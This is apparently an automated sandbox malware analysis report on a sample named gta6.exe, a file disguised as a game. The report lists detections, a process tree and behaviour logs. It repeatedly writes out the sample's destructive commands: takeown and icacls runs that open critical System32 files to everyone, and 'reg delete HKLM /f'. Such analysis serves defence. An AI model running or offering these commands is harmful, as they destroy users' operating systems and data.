Edit tour

Windows Analysis Report
gta6.exe

Overview

General Information

Sample name:	gta6.exe
Analysis ID:	1544786
MD5:	aaff8d22681e8bdee3c3ba55007f673f
SHA1:	aa94b52ee5290629165387bb0e7bdf3600e7a073
SHA256:	512b5deba1f1990f43876c48e0d8767f102cb7a0a949c6c9c6e079676bcd72eb
Tags:	exeuser-MDMCk10
Infos:

Detection

UACMe

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected UACMe UAC Bypass tool

AI detected suspicious sample

Machine Learning detection for sample

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Creates a process in suspended mode (likely to inject code)

Deletes files inside the Windows folder

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Suspicious Recursive Takeown

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Classification

Process Tree

System is w10x64

gta6.exe (PID: 6684 cmdline: "C:\Users\user\Desktop\gta6.exe" MD5: AAFF8D22681E8BDEE3C3BA55007F673F)

cmd.exe (PID: 6300 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmp\2791.bat C:\Users\user\Desktop\gta6.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

fsutil.exe (PID: 4472 cmdline: fsutil dirty query C: MD5: DE00EDA7134D3365E6074700E3008CAD)

takeown.exe (PID: 6964 cmdline: takeown /f C:\Windows\System32\hal.dll /r /d y MD5: D258A76AA885CBBCAE8C720CD1C284A5)

icacls.exe (PID: 3416 cmdline: icacls C:\Windows\System32\hal.dll /grant everyone:F /t MD5: 48C87E3B3003A2413D6399EA77707F5D)

takeown.exe (PID: 6208 cmdline: takeown /f C:\Windows\System32\winload.exe /r /d y MD5: D258A76AA885CBBCAE8C720CD1C284A5)

icacls.exe (PID: 5444 cmdline: icacls C:\Windows\System32\winload.exe /grant everyone:F /t MD5: 48C87E3B3003A2413D6399EA77707F5D)

takeown.exe (PID: 6448 cmdline: takeown /f C:\Windows\System32\winresume.exe /r /d y MD5: D258A76AA885CBBCAE8C720CD1C284A5)

icacls.exe (PID: 6456 cmdline: icacls C:\Windows\System32\winresume.exe /grant everyone:F /t MD5: 48C87E3B3003A2413D6399EA77707F5D)

takeown.exe (PID: 2868 cmdline: takeown /f C:\Windows\System32\winlogon.exe /r /d y MD5: D258A76AA885CBBCAE8C720CD1C284A5)

icacls.exe (PID: 7040 cmdline: icacls C:\Windows\System32\winlogon.exe /grant everyone:F /t MD5: 48C87E3B3003A2413D6399EA77707F5D)

takeown.exe (PID: 5420 cmdline: takeown /f C:\Windows\System32\wininit.exe /r /d y MD5: D258A76AA885CBBCAE8C720CD1C284A5)

icacls.exe (PID: 4092 cmdline: icacls C:\Windows\System32\wininit.exe /grant everyone:F /t MD5: 48C87E3B3003A2413D6399EA77707F5D)

takeown.exe (PID: 1260 cmdline: takeown /f C:\Windows\System32\ntoskrnl.exe /r /d y MD5: D258A76AA885CBBCAE8C720CD1C284A5)

icacls.exe (PID: 6132 cmdline: icacls C:\Windows\System32\ntoskrnl.exe /grant everyone:F /t MD5: 48C87E3B3003A2413D6399EA77707F5D)

takeown.exe (PID: 6504 cmdline: takeown /f C:\Windows\System32\regedit.exe /r /d y MD5: D258A76AA885CBBCAE8C720CD1C284A5)

icacls.exe (PID: 1448 cmdline: icacls C:\Windows\System32\regedit.exe /grant everyone:F /t MD5: 48C87E3B3003A2413D6399EA77707F5D)

takeown.exe (PID: 5140 cmdline: takeown /f C:\Windows\System32\taskmgr.exe /r /d y MD5: D258A76AA885CBBCAE8C720CD1C284A5)

icacls.exe (PID: 7040 cmdline: icacls C:\Windows\System32\taskmgr.exe /grant everyone:F /t MD5: 48C87E3B3003A2413D6399EA77707F5D)

takeown.exe (PID: 3540 cmdline: takeown /f C:\Windows\System32\consent.exe /r /d y MD5: D258A76AA885CBBCAE8C720CD1C284A5)

icacls.exe (PID: 1352 cmdline: icacls C:\Windows\System32\consent.exe /grant everyone:F /t MD5: 48C87E3B3003A2413D6399EA77707F5D)

takeown.exe (PID: 5420 cmdline: takeown /f C:\Windows\System32\drivers /r /d y MD5: D258A76AA885CBBCAE8C720CD1C284A5)

icacls.exe (PID: 7044 cmdline: icacls C:\Windows\System32\drivers /grant everyone:F /t MD5: 48C87E3B3003A2413D6399EA77707F5D)

reg.exe (PID: 6384 cmdline: reg delete HKLM /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
UACMe	A toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 7 - Windows 10. Typically, components of this tool are stripped out and reused by malicious actors.	No Attribution	https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/ https://github.com/hfiref0x/UACME	https://malpedia.caad.fkie.fraunhofer.de/details/win.uacme

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: reg.exe PID: 6384	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security

Sigma Signatures

Sigma detected: Suspicious Recursive Takeown

Source: Process started

Author: frack113: Data: Command: takeown /f C:\Windows\System32\hal.dll /r /d y, CommandLine: takeown /f C:\Windows\System32\hal.dll /r /d y, CommandLine|base64offset|contains: , Image: C:\Windows\System32\takeown.exe, NewProcessName: C:\Windows\System32\takeown.exe, OriginalFileName: C:\Windows\System32\takeown.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmp\2791.bat C:\Users\user\Desktop\gta6.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6300, ParentProcessName: cmd.exe, ProcessCommandLine: takeown /f C:\Windows\System32\hal.dll /r /d y, ProcessId: 6964, ProcessName: takeown.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: gta6.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: gta6.exe

ReversingLabs: Detection: 36%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.4% probability

Machine Learning detection for sample

Source: gta6.exe

Joe Sandbox ML: detected

Exploits

Yara detected UACMe UAC Bypass tool

Source: Yara match

File source: Process Memory Space: reg.exe PID: 6384, type: MEMORYSTR

Source:

Binary string: AcroExch.PDBookmark]bS source: reg.exe, 00000020.00000003.1441099460.0000024D35084000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\gta6.exe	File opened: C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmp\2791.tmp	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	File opened: C:\Users\user~1\	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	File opened: C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmp	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	File opened: C:\Users\user\AppData\Local\Temp\278F.tmp	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	File opened: C:\Users\user~1\AppData\Local\	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	File opened: C:\Users\user~1\AppData\	Jump to behavior

Source: C:\Users\user\Desktop\gta6.exe

Code function: 0_2_000000014000B64C NtdllDefWindowProc_W,GetWindowLongPtrW,GetWindowTextLengthW,RtlAllocateHeap,GetWindowTextW,EnableWindow,DestroyWindow,UnregisterClassW,

0_2_000000014000B64C

Source: C:\Windows\System32\cmd.exe

File deleted: C:\Windows\System32\drivers\DriverData

Jump to behavior

Source: C:\Users\user\Desktop\gta6.exe	Code function: 0_2_000000014001F888	0_2_000000014001F888
Source: C:\Users\user\Desktop\gta6.exe	Code function: 0_2_00000001400138E5	0_2_00000001400138E5
Source: C:\Users\user\Desktop\gta6.exe	Code function: 0_2_00000001400154F0	0_2_00000001400154F0
Source: C:\Users\user\Desktop\gta6.exe	Code function: 0_2_0000000140015160	0_2_0000000140015160
Source: C:\Users\user\Desktop\gta6.exe	Code function: 0_2_0000000140015170	0_2_0000000140015170
Source: C:\Users\user\Desktop\gta6.exe	Code function: 0_2_0000000140013175	0_2_0000000140013175
Source: C:\Users\user\Desktop\gta6.exe	Code function: 0_2_0000000140010210	0_2_0000000140010210
Source: C:\Users\user\Desktop\gta6.exe	Code function: 0_2_0000000140016210	0_2_0000000140016210
Source: C:\Users\user\Desktop\gta6.exe	Code function: 0_2_000000014000EA48	0_2_000000014000EA48
Source: C:\Users\user\Desktop\gta6.exe	Code function: 0_2_000000014001366E	0_2_000000014001366E
Source: C:\Users\user\Desktop\gta6.exe	Code function: 0_2_000000014000B758	0_2_000000014000B758
Source: C:\Users\user\Desktop\gta6.exe	Code function: 0_2_0000000140012FDD	0_2_0000000140012FDD

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg delete HKLM /f

Source: reg.exe, 00000020.00000003.1441099460.0000024D35084000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: .vbprojCx

Source: classification engine

Classification label: mal72.expl.winEXE@46/2@0/0

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_03

Source: C:\Users\user\Desktop\gta6.exe

File created: C:\Users\user\AppData\Local\Temp\278F.tmp

Jump to behavior

Source: C:\Users\user\Desktop\gta6.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmp\2791.bat C:\Users\user\Desktop\gta6.exe"

Source: C:\Users\user\Desktop\gta6.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\gta6.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: gta6.exe

ReversingLabs: Detection: 36%

Source: unknown	Process created: C:\Users\user\Desktop\gta6.exe "C:\Users\user\Desktop\gta6.exe"
Source: C:\Users\user\Desktop\gta6.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmp\2791.bat C:\Users\user\Desktop\gta6.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fsutil.exe fsutil dirty query C:
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\hal.dll /r /d y
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\hal.dll /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winload.exe /r /d y
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winload.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winresume.exe /r /d y
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winresume.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winlogon.exe /r /d y
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winlogon.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\wininit.exe /r /d y
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\wininit.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\ntoskrnl.exe /r /d y
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\ntoskrnl.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\regedit.exe /r /d y
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\regedit.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\taskmgr.exe /r /d y
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\consent.exe /r /d y
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\consent.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\drivers /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete HKLM /f
Source: C:\Users\user\Desktop\gta6.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmp\2791.bat C:\Users\user\Desktop\gta6.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fsutil.exe fsutil dirty query C:	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\hal.dll /r /d y	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\hal.dll /grant everyone:F /t	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winload.exe /r /d y	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winload.exe /grant everyone:F /t	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winresume.exe /r /d y	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winresume.exe /grant everyone:F /t	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winlogon.exe /r /d y	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winlogon.exe /grant everyone:F /t	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\wininit.exe /r /d y	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\wininit.exe /grant everyone:F /t	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\ntoskrnl.exe /r /d y	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\ntoskrnl.exe /grant everyone:F /t	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\regedit.exe /r /d y	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\regedit.exe /grant everyone:F /t	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\taskmgr.exe /r /d y	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winlogon.exe /grant everyone:F /t	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\consent.exe /r /d y	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\consent.exe /grant everyone:F /t	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\wininit.exe /r /d y	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\drivers /grant everyone:F /t	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete HKLM /f	Jump to behavior

Source: C:\Users\user\Desktop\gta6.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\takeown.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\icacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\takeown.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\icacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\takeown.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\icacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\takeown.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\icacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\takeown.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\icacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\takeown.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\icacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\takeown.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\icacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\takeown.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\icacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\takeown.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\icacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\takeown.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\takeown.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\icacls.exe	Section loaded: ntmarta.dll

Source: C:\Users\user\Desktop\gta6.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: gta6.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source:

Binary string: AcroExch.PDBookmark]bS source: reg.exe, 00000020.00000003.1441099460.0000024D35084000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\gta6.exe

Code function: 0_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,

0_2_000000014000D9C4

Source: C:\Users\user\Desktop\gta6.exe

Code function: 0_2_000000014001BD3E push rbx; ret

0_2_000000014001BD3F

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\hal.dll /grant everyone:F /t

Source: C:\Users\user\Desktop\gta6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\icacls.exe	File opened / queried: C:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563\regedit.exe	Jump to behavior
Source: C:\Windows\System32\icacls.exe	File opened / queried: C:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563\	Jump to behavior
Source: C:\Windows\System32\icacls.exe	File opened / queried: C:\Windows\System32\drivers\vmci.sys
Source: C:\Windows\System32\takeown.exe	File opened / queried: C:\Windows\System32\drivers\vmci.sys\	Jump to behavior

Source: C:\Users\user\Desktop\gta6.exe

Window / User API: threadDelayed 982

Jump to behavior

Source: C:\Users\user\Desktop\gta6.exe TID: 820

Thread sleep count: 982 > 30

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\gta6.exe	File opened: C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmp\2791.tmp	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	File opened: C:\Users\user~1\	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	File opened: C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmp	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	File opened: C:\Users\user\AppData\Local\Temp\278F.tmp	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	File opened: C:\Users\user~1\AppData\Local\	Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe	File opened: C:\Users\user~1\AppData\	Jump to behavior

Source: reg.exe, 00000020.00000003.1600455731.0000024D350C9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6242WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O T
Source: reg.exe, 00000020.00000003.1612618239.0000024D350CD000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1616503260.0000024D350CD000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1641852190.0000024D350CF000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1594439512.0000024D350E1000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1597565960.0000024D350DF000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1607595828.0000024D350CD000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1598748911.0000024D350DB000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1599138962.0000024D350DB000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1599859371.0000024D350C9000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1598120945.0000024D350DF000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1601887206.0000024D350D1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: X2Hyper-V VM Vid Partition
Source: reg.exe, 00000020.00000003.1600387159.0000024D35802000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal 